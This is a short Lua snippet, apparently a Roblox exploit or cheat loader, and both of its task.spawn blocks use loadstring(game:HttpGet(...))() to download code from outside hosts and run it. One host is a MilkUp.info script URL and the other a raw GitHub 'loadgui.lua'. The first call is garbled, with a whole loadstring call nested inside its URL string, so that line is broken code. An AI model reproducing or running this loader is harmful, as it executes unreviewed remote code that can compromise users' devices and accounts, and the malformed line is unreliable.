task.spawn(function()
    loadstring(game:HttpGet("loadstring(game:HttpGet("https://MilkUp.info/script"))()"))()
    end)
task.spawn(function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/zbezxderxcz/Gui/main/loadgui.lua"))()
end)
